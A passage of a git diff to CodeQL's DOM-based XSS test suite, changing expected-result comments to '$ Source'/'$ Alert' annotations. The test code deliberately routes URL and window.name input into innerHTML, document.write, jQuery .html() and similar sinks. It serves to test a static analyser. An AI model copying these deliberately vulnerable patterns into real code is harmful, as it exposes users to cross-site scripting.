$sce.trustAsUNKNOWN(document.location.search); // OK - $sce.trustAs($sce.HTML, document.location.search); // NOT OK - $sce.trustAs($sce.CSS, document.location.search); // NOT OK - $sce.trustAs(UNKNOWN, document.location.search); // OK - $other.trustAsHtml(document.location.search); // OK + $sce.trustAsHtml(document.location.search); // $ Alert + $sce.trustAsCss(document.location.search); // $ Alert + $sce.trustAsUNKNOWN(document.location.search); + $sce.trustAs($sce.HTML, document.location.search); // $ Alert + $sce.trustAs($sce.CSS, document.location.search); // $ Alert + $sce.trustAs(UNKNOWN, document.location.search); + $other.trustAsHtml(document.location.search); }) .service("myService2", function() { - angular.element('
    ').html(document.location.search); // NOT OK - angular.element('
    ').html('SAFE'); // OK + angular.element('
    ').html(document.location.search); // $ Alert + angular.element('
    ').html('SAFE'); }) .directive('myCustomer', function() { return { link: function(scope, element){ - element.html(document.location.search); // NOT OK - element.html('SAFE'); // OK + element.html(document.location.search); // $ Alert + element.html('SAFE'); } }; }) .service("myService3", function() { - angular.element(document.location.search); // NOT OK - angular.element('SAFE'); // OK + angular.element(document.location.search); // $ Alert + angular.element('SAFE'); }) function tst() { - var v = document.location.search.substr(1); + var v = document.location.search.substr(1); // $ Source - // NOT OK - document.write(v); + document.write(v); // $ Alert if (/^\d+$/.test(v)) { - // OK + document.write(v); } if ((m = /^\d+$/.exec(v))) { - // OK + document.write(v); } if (v.match(/^\d+$/)) { - // OK + document.write(v); } if (v.match("^\\d+$")) { - // OK + document.write(v); } if (!(/\d+/.test(v))) // not effective - matches "123" return; - // NOT OK - document.write(v); + document.write(v); // $ Alert if (!(/^\d+$/.test(v))) return; - // OK + document.write(v); } function angularJSServices() { angular.module('myApp', []) .factory("xssSource_to_service", ["xssSinkService1", function(xssSinkService1) { - xssSinkService1(window.location.search); + xssSinkService1(window.location.search); // $ Source }]) .factory("xssSinkService1", function(){ - return function(v){ $("
    ").html(v); } // NOT OK + return function(v){ $("
    ").html(v); } // $ Alert }) .factory("xssSource_from_service", ["xssSourceService", function(xssSourceService){ - $("
    ").html(xssSourceService()); // NOT OK + $("
    ").html(xssSourceService()); // $ Alert }]) .factory("xssSourceService", function(){ - return function() { return window.location.search }; + return function() { return window.location.search }; // $ Source }) .factory("innocentSource_to_service", ["xssSinkService2", function(xssSinkService2) { xssSinkService2("innocent"); }]) .factory("xssSinkService2", function(){ - return function(v){ $("
    ").html(v); } // OK + return function(v){ $("
    ").html(v); } }) .factory("innocentSource_from_service", ["innocentSourceService", function(innocentSourceService){ - $("
    ").html(innocentSourceService()); // OK + $("
    ").html(innocentSourceService()); }]) .factory("innocentSourceService", function(){ return function() { return "innocent" }; @@ -174,30 +158,30 @@ function angularJSServices() { } function testDOMParser() { - var target = document.location.search + var target = document.location.search // $ Source var parser = new DOMParser(); - parser.parseFromString(target, "application/xml"); // NOT OK + parser.parseFromString(target, "application/xml"); // $ Alert } function references() { - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - document.body.innerHTML = tainted; // NOT OK + document.body.innerHTML = tainted; // $ Alert - document.createElement().innerHTML = tainted; // NOT OK - createElement().innerHTML = tainted; // NOT OK + document.createElement().innerHTML = tainted; // $ Alert + createElement().innerHTML = tainted; // $ Alert - document.getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName()[0].innerHTML = tainted; // NOT OK - getElementsByClassName().item().innerHTML = tainted; // NOT OK + document.getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName()[0].innerHTML = tainted; // $ Alert + getElementsByClassName().item().innerHTML = tainted; // $ Alert } function react(){ - var tainted = document.location.search; + var tainted = document.location.search; // $ Source - React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK - React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // NOT OK + React.createElement("div", {dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert + React.createFactory("div")({dangerouslySetInnerHTML: {__html: tainted}}); // $ Alert class C1 extends React.Component { constructor() { @@ -209,26 +193,26 @@ function react(){ } test() { - $('myId').html(this.state.tainted1); // NOT OK - $('myId').html(this.state.tainted2); // NOT OK - $('myId').html(this.state.tainted3); // NOT OK - $('myId').html(this.state.notTainted); // OK + $('myId').html(this.state.tainted1); // $ Alert + $('myId').html(this.state.tainted2); // $ Alert + $('myId').html(this.state.tainted3); // $ Alert + $('myId').html(this.state.notTainted); this.setState(prevState => { - $('myId').html(prevState.tainted4) // NOT OK + $('myId').html(prevState.tainted4) // $ Alert }); } } class C2 extends React.Component { test() { - $('myId').html(this.props.tainted1); // NOT OK - $('myId').html(this.props.tainted2); // NOT OK - $('myId').html(this.props.tainted3); // NOT OK - $('myId').html(this.props.notTainted); // OK + $('myId').html(this.props.tainted1); // $ Alert + $('myId').html(this.props.tainted2); // $ Alert + $('myId').html(this.props.tainted3); // $ Alert + $('myId').html(this.props.notTainted); this.setState((prevState, prevProps) => { - $('myId').html(prevProps.tainted4) // NOT OK + $('myId').html(prevProps.tainted4) // $ Alert }); } } @@ -248,7 +232,7 @@ function react(){ } render() { - return ; + return ; // $ Alert } } @@ -256,36 +240,36 @@ function react(){ } function windowName() { - $(window.name); // NOT OK - $(name); // NOT OK + $(window.name); // $ Alert + $(name); // $ Alert } function windowNameAssigned() { for (name of ['a', 'b']) { - $(window.name); // NOT OK - $(name); // OK + $(window.name); // $ Alert + $(name); } } function jqueryLocation() { - $(location); // OK - $(window.location); // OK - $(document.location); // OK + $(location); + $(window.location); + $(document.location); var loc1 = location; var loc2 = window.location; var loc3 = document.location; - $(loc1); // OK - $(loc2); // OK - $(loc3); // OK + $(loc1); + $(loc2); + $(loc3); - $("body").append(location); // NOT OK + $("body").append(location); // $ Alert } function testCreateContextualFragment() { - var tainted = window.name; + var tainted = window.name; // $ Source var range = document.createRange(); range.selectNode(document.getElementsByTagName("div").item(0)); - var documentFragment = range.createContextualFragment(tainted); // NOT OK + var documentFragment = range.createContextualFragment(tainted); // $ Alert document.body.appendChild(documentFragment); } @@ -293,74 +277,74 @@ function flowThroughPropertyNames() { var obj = {}; obj[Math.random()] = window.name; for (var p in obj) - $(p); // OK + $(p); } function basicExceptions() { try { - throw location; + throw location; // $ Source } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } try { try { - throw location + throw location // $ Source } finally {} } catch(e) { - $("body").append(e); // NOT OK + $("body").append(e); // $ Alert } } function handlebarsSafeString() { - return new Handlebars.SafeString(location); // NOT OK! + return new Handlebars.SafeString(location); // $ Alert } function test2() { var target = document.location.search - // OK + $('myId').html(target.length) } function getTaintedUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } function URLPseudoProperties() { let params = getTaintedUrl().searchParams; - $('name').html(params.get('name')); // NOT OK + $('name').html(params.get('name')); // $ Alert let myUrl = getTaintedUrl(); - $('name').html(myUrl.get('name')); // OK (.get is not defined on a URL) + $('name').html(myUrl.get('name')); // OK - .get is not defined on a URL } function hash() { function getUrl() { - return new URL(document.location); + return new URL(document.location); // $ Source } - $(getUrl().hash.substring(1)); // NOT OK + $(getUrl().hash.substring(1)); // $ Alert } function growl() { - var target = document.location.search - $.jGrowl(target); // NOT OK + var target = document.location.search // $ Source + $.jGrowl(target); // $ Alert } function thisNodes() { var pluginName = "myFancyJQueryPlugin"; var myPlugin = function () { - var target = document.location.search - this.html(target); // NOT OK. (this is a jQuery object) - this.innerHTML = target // OK. (this is a jQuery object) + var target = document.location.search // $ Source + this.html(target); // $ Alert - this is a jQuery object + this.innerHTML = target // OK - this is a jQuery object this.each(function (i, e) { - this.innerHTML = target; // NOT OK. (this is a DOM-node); - this.html(target); // OK. (this is a DOM-node); + this.innerHTML = target; // $ Alert - this is a DOM-node + this.html(target); // OK - this is a DOM-node - e.innerHTML = target; // NOT OK. + e.innerHTML = target; // $ Alert }); } $.fn[pluginName] = myPlugin; @@ -368,81 +352,80 @@ function thisNodes() { } function test() { - var target = document.location.search + var target = document.location.search // $ Source - // NOT OK - $('myId').html(target) + $('myId').html(target) // $ Alert // OK - but only safe because contents are URI-encoded $('myid').html(document.location.href.split("?")[0]); } function test() { - var target = document.location.search + var target = document.location.search // $ Source - $('myId').html(target); // NOT OK + $('myId').html(target); // $ Alert - $('myId').html(target.taint); // NOT OK + $('myId').html(target.taint); // $ Alert target.taint2 = 2; - $('myId').html(target.taint2); // OK + $('myId').html(target.taint2); - target.taint3 = document.location.search; - $('myId').html(target.taint3); // NOT OK + target.taint3 = document.location.search; // $ Source + $('myId').html(target.taint3); // $ Alert target.sub.taint4 = 2 - $('myId').html(target.sub.taint4); // OK + $('myId').html(target.sub.taint4); - $('myId').html(target.taint5); // NOT OK + $('myId').html(target.taint5); // $ Alert target.taint5 = "safe"; target.taint6 = 2; if (random()) {return;} - $('myId').html(target.taint6); // OK + $('myId').html(target.taint6); if (random()) {target.taint7 = "safe";} - $('myId').html(target.taint7); // NOT OK + $('myId').html(target.taint7); // $ Alert target.taint8 = target.taint8; - $('myId').html(target.taint8); // NOT OK + $('myId').html(target.taint8); // $ Alert target.taint9 = (target.taint9 = "safe"); - $('myId').html(target.taint9); // OK + $('myId').html(target.taint9); } function hash2() { - var payload = window.location.hash.substr(1); - document.write(payload); // NOT OK + var payload = window.location.hash.substr(1); // $ Source + document.write(payload); // $ Alert - let match = window.location.hash.match(/hello (\w+)/); + let match = window.location.hash.match(/hello (\w+)/); // $ Source if (match) { - document.write(match[1]); // NOT OK + document.write(match[1]); // $ Alert } - document.write(window.location.hash.split('#')[1]); // NOT OK + document.write(window.location.hash.split('#')[1]); // $ Alert } function nonGlobalSanitizer() { - var target = document.location.search + var target = document.location.search // $ Source - $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // NOT OK + $("#foo").html(target.replace(/[\s\S]*<\/metadata>/, '')); // $ Alert - $("#foo").html(target.replace(/<|>/g, '')); // OK + $("#foo").html(target.replace(/<|>/g, '')); } function mootools(){ - var source = document.location.search; + var source = document.location.search; // $ Source - new Element("div"); // OK - new Element("div", {text: source}); // OK - new Element("div", {html: source}); // NOT OK - new Element("div").set("html", source); // NOT OK - new Element("div").set({"html": source}); // NOT OK - new Element("div").setProperty("html", source); // NOT OK - new Element("div").setProperties({"html": source}); // NOT OK - new Element("div").appendHtml(source); // NOT OK + new Element("div"); + new Element("div", {text: source}); + new Element("div", {html: source}); // $ Alert + new Element("div").set("html", source); // $ Alert + new Element("div").set({"html": source}); // $ Alert + new Element("div").setProperty("html", source); // $ Alert + new Element("div").setProperties({"html": source}); // $ Alert + new Element("div").appendHtml(source); // $ Alert } @@ -450,63 +433,68 @@ const Convert = require('ansi-to-html'); const ansiToHtml = new Convert(); function ansiToHTML() { - var source = document.location.search; + var source = document.location.search; // $ Source - $("#foo").html(source); // NOT OK - $("#foo").html(ansiToHtml.toHtml(source)); // NOT OK + $("#foo").html(source); // $ Alert + $("#foo").html(ansiToHtml.toHtml(source)); // $ Alert } function domMethods() { - var source = document.location.search; + var source = document.location.search; // $ Source let table = document.getElementById('mytable'); - table.innerHTML = source; // NOT OK + table.innerHTML = source; // $ Alert let row = table.insertRow(-1); - row.innerHTML = source; // NOT OK + row.innerHTML = source; // $ Alert let cell = row.insertCell(); - cell.innerHTML = source; // NOT OK + cell.innerHTML = source; // $ Alert } function urlStuff() { - var url = document.location.search.substr(1); + var url = document.location.search.substr(1); // $ Source - $("", {href: url}).appendTo("body"); // NOT OK - $("#foo").attr("href", url); // NOT OK - $("#foo").attr({href: url}); // NOT OK - $("", {src: url}).appendTo("body"); // NOT OK - $("", {href: win.location.href}).appendTo("body"); // OK + $("", {href: url}).appendTo("body"); // $ Alert + $("#foo").attr("href", url); // $ Alert + $("#foo").attr({href: url}); // $ Alert + $("", {src: url}).appendTo("body"); // $ Alert + $("", {href: win.location.href}).appendTo("body"); - $("", {src: "http://google.com/" + url}).appendTo("body"); // OK + $("", {src: "http://google.com/" + url}).appendTo("body"); - $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); // OK + $("", {src: ["http://google.com", url].join("/")}).appendTo("body"); if (url.startsWith("https://")) { - $("", {src: url}).appendTo("body"); // OK + $("", {src: url}).appendTo("body"); } else { - $("", {src: url}).appendTo("body"); // NOT OK + $("", {src: url}).appendTo("body"); // $ Alert } window.open(location.hash.substr(1)); // OK - any JavaScript is executed in another context - navigation.navigate(location.hash.substr(1)); // NOT OK + navigation.navigate(location.hash.substr(1)); // $ Alert const myHistory = require('history').createBrowserHistory(); - myHistory.push(location.hash.substr(1)); // NOT OK + myHistory.push(location.hash.substr(1)); // $ Alert } function Foo() { this.foo = document; var obj = { bar: function() { - this.foo.body.innerHTML = decodeURI(window.location.hash); // NOT OK + this.foo.body.innerHTML = decodeURI(window.location.hash); // $ Alert } }; Object.assign(this, obj); } function nonGlobalSanitizer() { - var target = document.location.search - $("#foo").html(target.replace(new RegExp("<|>"), '')); // NOT OK - $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK -- most likely good. We don't know what the flags are. - $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); // OK + var target = document.location.search // $ Source + $("#foo").html(target.replace(new RegExp("<|>"), '')); // $ Alert + $("#foo").html(target.replace(new RegExp("<|>", unknownFlags()), '')); // OK - most likely good. We don't know what the flags are. + $("#foo").html(target.replace(new RegExp("<|>", "g"), '')); +} + +function FooBar() { + let source = window.name; // $ Source + $('myId').html(unescape(source)) // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js index a6d26e408872..eb1074a5a62f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/tst3.js @@ -1,14 +1,14 @@ var foo = document.getElementById("foo"); -var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); +var data = JSON.parse(decodeURIComponent(window.location.search.substr(1))); // $ Source -foo.setAttribute("src", data.src); // NOT OK -foo.setAttribute("HREF", data.p); // NOT OK -foo.setAttribute("width", data.w); // OK -foo.setAttribute("xlink:href", data.p) // NOT OK +foo.setAttribute("src", data.src); // $ Alert +foo.setAttribute("HREF", data.p); // $ Alert +foo.setAttribute("width", data.w); +foo.setAttribute("xlink:href", data.p) // $ Alert -foo.setAttributeNS('xlink', 'href', data.p); // NOT OK -foo.setAttributeNS('foobar', 'href', data.p); // NOT OK -foo.setAttributeNS('baz', 'width', data.w); // OK +foo.setAttributeNS('xlink', 'href', data.p); // $ Alert +foo.setAttributeNS('foobar', 'href', data.p); // $ Alert +foo.setAttributeNS('baz', 'width', data.w); for (var p in data) diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js index d434ddf20e8e..a3694f3cf79e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/typeahead.js @@ -17,12 +17,12 @@ { name: 'dashboards', source: function (query, cb) { - var target = document.location.search + var target = document.location.search // $ Source cb(target); }, templates: { suggestion: function(val) { - return val; // NOT OK + return val; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/v-html.vue b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/v-html.vue index 3964d4adad36..d75413a527b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/v-html.vue +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/v-html.vue @@ -1,9 +1,9 @@